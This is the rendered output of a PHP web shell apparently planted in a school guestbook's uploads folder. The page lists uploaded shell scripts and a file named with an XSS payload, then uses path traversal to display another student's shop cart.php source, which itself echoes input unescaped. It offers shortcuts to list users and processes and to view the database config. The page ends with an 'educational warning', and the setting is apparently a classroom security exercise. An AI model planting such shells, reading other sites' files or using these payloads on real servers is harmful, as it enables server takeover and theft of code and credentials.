🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ../../../../577325.klas4s23.mid-ica.nl/public_html/l4-pro-1-food-delivery-express-dlf/cart.php

<?php
session_start(); // Start de sessie
include $_SERVER['DOCUMENT_ROOT'] . '/inc/data.php';

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (isset($_POST['product_id'])) {
        $productId = intval($_POST['product_id']);
        $productName = $_POST['product_name'];
        $productPrice = floatval($_POST['product_price']);
        $optionId = intval($_POST['option_id'] ?? 0);
        $optionName = $_POST['option_name'] ?? '';
        $optionPrice = floatval($_POST['option_price'] ?? 0);
        $extraIds = $_POST['extra_ids'] ?? [];
        $extraNames = $_POST['extra_names'] ?? [];
        $extraPrices = $_POST['extra_prices'] ?? [];

        $cartItemId = $productId . '-' . $optionId . '-' . implode('-', $extraIds);

        if (!isset($_SESSION['cart'])) {
            $_SESSION['cart'] = [];
        }

        if (!isset($_SESSION['cart'][$cartItemId])) {
            $_SESSION['cart'][$cartItemId] = [
                'product_id' => $productId,
                'name' => $productName,
                'price' => $productPrice,
                'quantity' => 0,
                'option' => [
                    'id' => $optionId,
                    'name' => $optionName,
                    'price' => $optionPrice,
                ],
                'extras' => []
            ];

            foreach ($extraIds as $index => $extraId) {
                $_SESSION['cart'][$cartItemId]['extras'][] = [
                    'id' => intval($extraId),
                    'name' => $extraNames[$index],
                    'price' => floatval($extraPrices[$index])
                ];
            }
        }

        $_SESSION['cart'][$cartItemId]['quantity']++;

        header("Location: cart.php");
        exit();
    } elseif (isset($_POST['remove_product_id'])) {
        $removeProductId = $_POST['remove_product_id'];
        if (isset($_SESSION['cart'][$removeProductId])) {
            unset($_SESSION['cart'][$removeProductId]);
        }
        header("Location: cart.php");
        exit();
    } elseif (isset($_POST['update_product_id'])) {
        $updateProductId = $_POST['update_product_id'];
        $newQuantity = intval($_POST['new_quantity']);
        if (isset($_SESSION['cart'][$updateProductId]) && $newQuantity > 0) {
            $_SESSION['cart'][$updateProductId]['quantity'] = $newQuantity;
        } elseif ($newQuantity <= 0) {
            unset($_SESSION['cart'][$updateProductId]);
        }
        echo json_encode(['success' => true]);
        exit();
    } elseif (isset($_POST['username']) || isset($_POST['adres']) || isset($_POST['phone'])) {
        // Order verwerken en doorverwijzen naar de thankyou pagina
        $adres = $_POST['adres'];
        $cart = $_SESSION['cart'];
        $now = date("Y-m-d H:i:s");

        $login = Session::get('login');
        $id = $login === true ? Session::get('id') : null;
        $user = $auth->getUserById($id);

        // Ordergegevens opslaan in sessie
        $_SESSION['order'] = [
            'adres' => $adres,
            'cart' => $cart
        ];

        // Convert cart items to products array
        $products = [];
        foreach ($cart as $cartItem) {
            $products[] = [
                'product_id' => $cartItem['product_id'],
                'quantity' => $cartItem['quantity']
            ];
        }

        $result = $orders->addOrder($id, $user->firstname . ' ' . $user->lastname, $user->mobile, $user->email, 'Bezorgen', $user->street . ' ' . $user->number . ' ' . $user->postal . ' ' . $user->city, $now, null, $products);

        // Verwijder de winkelmand
        unset($_SESSION['cart']);

        // Redirect naar thankyou pagina
        header("Location: thankyou.php");
        exit();
    }
}

// Winkelmandje weergeven
$cart = $_SESSION['cart'] ?? [];
$total = 0;
?>

<!DOCTYPE html>
<html lang="nl">
<?php include $_SERVER['DOCUMENT_ROOT'] . "/inc/site/head.php"; ?>

<body>
    <?php include $_SERVER['DOCUMENT_ROOT'] . "/inc/site/header.php"; ?>

    <div id="cart">
        <?php
        if (count($cart) > 0) {
            foreach ($cart as $cartItemId => $product) {
                $option = $product['option'];
                $extras = $product['extras'];
                $itemTotal = ($product['price'] + $option['price']);
                foreach ($extras as $extra) {
                    $itemTotal += $extra['price'];
                }
                $itemTotal *= $product['quantity'];
                $total += $itemTotal;

                echo "<div class='cart-item'>";
                    echo "<div class='itemName'>";
                        echo "<p class='hoofdname'>{$product['name']}</p>";

                        echo "<div class='extracart'>";
                            if ($option['name']) {
                                echo "<p>- optie:</p>";
                                echo "<span>  *{$option['name']}</span>  ";
                            }
                            if ($extras) {
                                echo "<p>- extra:</p>";
                                foreach ($extras as $extra) {
                                    echo "<span>  *{$extra['name']} </span><br>";
                                }
                            }
                        echo "</div>";
                    echo "</div>";
                    if ($option['price']) {
                        echo "<p>&euro; " . number_format($product['price'] + $option['price'], 2, ',', '.') . "</p>";
                    } else {
                        echo "<p>&euro;" . number_format($product['price'], 2, ',', '.') . "</p>";
                    }
                    echo "<input type='number' class='quantity-input' data-product-id='$cartItemId' value='{$product['quantity']}' min='1'>";
                    echo "<form method='post' onsubmit='return confirmDelete()'>";
                    echo "<input type='hidden' name='remove_product_id' value='$cartItemId'>";
                    echo "<button>Verwijderen</button>";
                    echo "</form>";
                echo "</div>";
            }
            echo "<p><strong>Totaal: &euro;" . number_format($total, 2, ',', '.') . "</strong></p>";
            echo "<a class='verder' href='order.php'>Verder bestellen</a>";
            echo "<button id='checkoutButton' class='verder'>Order plaatsen</button>";
        } else {
            echo "<p><strong><span>Uw winkelmandje is leeg!</span></strong></p>";
            echo "<a class='verder' href='order.php'>Verder bestellen</a>";
        }
        ?>
    </div>

    <!-- Modal HTML -->
    <div id="checkoutModal" class="modal">
        <div class="modal-content">
            <span class="close" onclick="closeModal()">&times;</span>
            <h3>Order Check</h3>
            <p><strong>Totaal: &euro;<?php echo number_format($total, 2, ',', '.'); ?></strong></p>
            <form method="post" action="">

                <?php
            
                if (Session::get('login')){
                    $user = $auth->getUserById(Session::get('id'));
                    echo "<h2> name: " . $user->firstname . " " . $user->lastname . "</h2>";
                    echo "<h2> tel: " .$user->mobile . "</h2>";
                    echo "<label for='adres'>Adres:</label>";
                    echo "<input type='text' name='adres' id='adres' required>";  
                }
                else {
                             
                echo "<label for='username'>Naam:</label>";
                echo "<input type='text' name='username' id='username' required>";
                echo "<label for='adres'>Adres:</label>";
                echo "<input type='text' name='adres' id='adres' required>";
                echo "<label for='phone'>Telefoon:</label>";
                echo "<input type='text' name='phone' id='phone' required>";

                }

            ?>
                    <h2>Bezorgingmethode</h2>
                    <label class="bezorgmethode">
                        <input type="radio" name="delivery_method" value="bezorgen" required>
                        <span class="checkmark">Bezorgen</span>
                    </label>
                    <label class="bezorgmethode">
                        <input type="radio" name="delivery_method" value="afhalen">
                        <span class="checkmark">Afhalen</span>
                    </label>
                  

                <h2>Betalingsmethode</h2>
                <select name="payment_method" id="payment_method" onchange="showOptions(this.value)" required>
                    <option value="paypal">Paypal</option>
                    <option value="credit_card">Credit card</option>
                    <option value="giftcard">Giftcard</option>
                    <option value="ideal">Ideal</option>
                </select>
                <div id="additional_options"></div>
                <button type="submit">Order plaatsen</button>
            </form>
        </div>
    </div>

    <script>
        var modal = document.getElementById('checkoutModal');
        var btn = document.getElementById('checkoutButton');
        var span = document.getElementsByClassName('close')[0];

        btn.onclick = function() {
            modal.style.display = 'block';
        }

        span.onclick = function() {
            modal.style.display = 'none';
        }

        window.onclick = function(event) {
            if (event.target == modal) {
                modal.style.display = 'none';
            }
        }

        function closeModal() {
            modal.style.display = 'none';
        }

        function confirmDelete() {
            return confirm('Weet je zeker dat je dit item wilt verwijderen?');
        }

        function showOptions(paymentMethod) {
            let optionsDiv = document.getElementById('additional_options');
            optionsDiv.innerHTML = ''; // Clear previous options

            if (paymentMethod === 'paypal') {
                optionsDiv.innerHTML = `
                    <label for='paypal'>Paypal:</label>
                    <select name='paypal' id='paypal'>
                        <option required value='paypal'>Paypal</option>
                    </select>
                `;
            } else if (paymentMethod === 'ideal') {
                optionsDiv.innerHTML = `
                    <label for='bank_selection'>Bank:</label>
                    <select required name='bank_selection' id='bank_selection'>
                        <option value='abn'>ABN</option>
                        <option value='rabobank'>Rabobank</option>
                        <option value='ing'>ING</option>
                        <option value='bunq'>Bunq</option>
                        <option value='knab'>Knab</option>
                        <option value='asn'>ASN</option>
                    </select>
                `;
            } else if (paymentMethod === 'credit_card') {
                optionsDiv.innerHTML = `
                    <label for='credit_card'>Credit Card:</label>
                    <select required name='credit_card' id='credit_card'>
                        <option value='visa'>Visa</option>
                        <option value='mastercard'>Mastercard</option>
                        <option value='american_express'>American Express</option>
                    </select>
                `;
            } else if (paymentMethod === 'giftcard') {
                optionsDiv.innerHTML = `
                    <label for='giftcard'>Giftcard:</label>
                    <select required name='giftcard' id='giftcard'>
                        <option value='bol.com'>Bol.com</option>
                        <option value='amazon'>Amazon</option>
                        <option value='mediamarkt'>Mediamarkt</option>
                    </select>
                `;
            }
        }

        document.querySelectorAll('.quantity-input').forEach(input => {
            input.addEventListener('change', function() {
                const productId = this.getAttribute('data-product-id');
                const newQuantity = this.value;

                if (newQuantity <= 0) {
                    if (!confirm('Weet je zeker dat je dit item wilt verwijderen?')) {
                        return;
                    }
                }

                const xhr = new XMLHttpRequest();
                xhr.open('POST', 'cart.php', true);
                xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
                xhr.onreadystatechange = function() {
                    if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
                        // Opnieuw laden van de pagina of andere acties kunnen hier worden uitgevoerd
                        location.reload();
                    }
                };
                xhr.send(`update_product_id=${productId}&new_quantity=${newQuantity}`);
            });
        });
    </script>
</body>
</html>

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!